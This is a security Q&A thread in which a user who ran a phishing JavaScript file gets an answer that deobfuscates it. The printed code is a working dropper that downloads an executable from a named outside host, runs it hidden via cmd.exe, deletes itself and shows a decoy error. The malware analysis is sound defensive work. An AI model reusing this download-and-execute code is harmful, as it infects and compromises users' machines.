1

I accidentally executed a .js file from a phishing source with Windows Script Host. If possible I really don't want to reformat. If anyone could analyse this file it'd be awesome.

I'm running Windows 7, 64bit.

You can find the JS file in github. It's around 50,000 chars. A lot of it are dummy functions.

Here are Virus scanner results.

Edit: Not a duplicate because the intent of the virus is different to others. Same obfuscation idea, different content.

Anders
  • 65,052
  • 24
  • 180
  • 218
Volaix
  • 13
  • 3
  • It seems to be one of the ActiveX malware downloaders currently circulating. Although the obfuscation method is different it seems to be a similar script as [this](https://security.stackexchange.com/questions/147714/de-obfuscation-of-malicious-javascript-in-spoofed-email) or [this](https://security.stackexchange.com/questions/148497/how-to-deobfuscate-suspicious-javascript-code) one. – Arminius Feb 15 '17 at 05:22
  • Was [this](https://www.hybrid-analysis.com/sample/68445e52ab786727a7742790438acde1104b45084b84a05235dd6adaff6e722e?environmentId=100) you? – Jedi Feb 15 '17 at 05:43
  • @Jedi Nope. That wasn't me. But thanks for asking! Looks like someone else has been getting it. – Volaix Feb 15 '17 at 06:59
  • @Arminius Yeah I did note that too! Thanks for pointing it out! – Volaix Feb 15 '17 at 06:59
  • I've put it through this scanner and have found the specific trojan I think. https://www.virustotal.com/en/file/9250b704775cd9dc2756f6cd17eddc1759e1580d16f8cc490c28b2bdefd613ba/analysis/1487143532/ I've installed Emsisoft, one of the virus scanners that detects it from the results, and have searched. It comes up clean. – Volaix Feb 15 '17 at 07:57

1 Answers1

3

How to deobfuscate

All the functions

All the strangely named functions just returns whatever is passed into them. So code like xmudzymza(["an"][0]) is actually just a convoluted way of writing "an". If you copy paste the code into an editor with syntax highlighting you can read large parts of the deobfuscated code by just ignoring everything that isn't highlighted as string literals!

Creating and testing ActiveXObject

Among all the functions you have a not so well hidden ActiveXObject:

uzuqevr = ActiveXObject;

Right before the if clause it pops up again:

var agwibak = new uzuqevr(obrujaw(["Sc"][0]) + ... + qowokl(["ct"][0]);
var ctaqev = new['ukehkyk', Function, 'lebate'][1](repu(["va"][0]) + ... + nwavale([";"][0]));

If you run just the long string concatenation inside the parantesis in the console, you get the string Scripting.FileSystemObject. So what we have is actually this:

var agwibak = new ActiveXObject("Scripting.FileSystemObject");

On the line after that we have this:

var ctaqev = new['ukehkyk', Function, 'lebate'][1](repu(["va"][0]) + ... + nwavale([";"][0]));

It creates a new of the first element in the vector - that is Function. The function constructor creates a function from a string of code, sort of like eval. The function is assigned to ctagev. Just like above we can evaluate the long string concatenation in the console (without actually running it). This is the function:

(function() {
    var ggelkigtu = agwibak.GetDrive(agwibak.GetDriveName('C:\oeokiotifgjvdkslsdfsdghrefvdfbdhgdgdfgd\dsgdgdfgdfgdf\354353535345\sdfsfsdfsdfdsf')).SerialNumber; if(ggelkigtu < 0 || ggelkigtu > 0) return true; else return false;
})

That function is then called in the if clause:

if (ctaqev()) { ... }

So what does it do? It tries to create an ActiveXObject and assign it to ggelkigtu. It then returns a boolean based on ggelkigtu < 0 || ggelkigtu > 0. If the JS interpreter does not support ActiveX ggelkigtu will be undefined, and that condition will be false. So if your interpreter does not support ActiveX the content of the if clause will be ignored.

Inside the if clause

To obfuscate this part you need to do two things:

  1. Change the names of the ridiculusly long variable names (by just doing search and replace).
  2. Again, remove the xxxxxx(["ab"][0]) to get the actual strings.

What you get is this:

if (ctaqev()) {
    long1 = this["WScript"];
    long2 = long1["CreateObject"]("Scripting.FileSystemObject");
    long3 = long1["CreateObject"]("WScript.Shell");
    long4 = long1["CreateObject"]("L2TP");
    long5 = long1["CreateObject"]("ADODB.Stream");
    long6 = long2["GetSpecialFolder"]("2");
    long7 = long2["GetTempName"]();
    long8 = long4["open"]("T", "http://moosetraxtax.com/images/total.exe", "0");
    long8 = long4["send"]();
    long5["type"] = ["1"];
    long9 = long4["ResponseBody"];
    long10 = long1["ScriptFullName"];
    long8 = long5["Open"]();
    long8 = long5["Write"](long9);
    long8 = long5["SaveToFile"](long6 + long7);
    long8 = long5["Close"]();
    long8 = long3["run"]("cmd.exe /c " + long6 + long7, "0");
    long8 = long2["deleteFile"](long10);

}
long1["echo"]("The file is corrupt and cannot be opened");

Cleaning it up some more (by using . instead of [""] and changing the variable names again) we get this:

if(ctaqev()) {
    fileSystem = WScript.CreateObject("Scripting.FileSystemObject");
    shell = WScript.CreateObject("WScript.Shell");
    l2tp = WScript.CreateObject("L2TP");
    stream = WScript.CreateObject("ADODB.Stream");
    folder = fileSystem.GetSpecialFoldder("2");
    tempName = fileSystem.GetTempName();
    x = l2tp.open("T", "http://moosetraxtax.com/images/total.exe", "0");
    x = l2tp.send();
    stream.type = "1";
    response = l2tp.ResponseBody;
    scriptName = WScript.ScriptFullName;
    x = stream.Open()
    x = stream.Write(response);
    x = stream.SaveToFile(folder + tempName);
    x = stream.Close();
    x = shell.run("cmd.exe /c " + folder + tempName, "0");
    x = fileSystem.deleteFile(scriptName);
}
WScript.echo("The file is corrupt and cannot be opened");

What does it do? Are you infected?

I dont know much about ActiveX, but it sure looks like it downloads a file from http://moosetraxtax.com/images/total.exe and runs it. Surprisingly, only three AV vendors identify that URL as malware on Virus Total, but I think we can be pretty sure it is.

If you want to know what you got, you can try to download it from there and investigate. Obviously that is a risky activity, and there is no guarantee you will get the same thing.

Running this script in a modern browser would be safe, because they do not support ActiveX. But you ran it with Windows Script Host. I don't know what if any limitations a script executed by WSH has, but to be on the safe side I would assume that the computer is infected and treat it as such.

If you want to make sure you really were infected, I would recommend the following:

  • Find out what WSH really allows a script to do. (I don't know the answer to that, sorry.)
  • Check the logs for your firewall (if you have one) to see if the request was blocked.
Anders
  • 65,052
  • 24
  • 180
  • 218
  • 1
    I believe Windows executes such scripts without any sandboxing as it assumes those stand-alone files are just like .exe files. – André Borie Feb 16 '17 at 10:55